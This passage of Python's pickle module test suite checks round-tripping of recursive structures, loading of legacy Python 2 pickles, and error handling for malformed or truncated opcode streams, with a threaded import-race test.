DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(KeyError, b'g0\np0')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
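# Illustrative sketch (not part of the original test suite): the GET/BINGET/
# LONG_BINGET tests above check that memo opcodes restore shared references.
# The same behaviour can be observed with the public API alone:
def _demo_memo_sharing():
    import pickle
    shared = []
    data = pickle.dumps((shared, shared), protocol=0)  # emits PUT/GET opcodes
    first, second = pickle.loads(data)
    assert first is second  # the memo restores object identity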
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
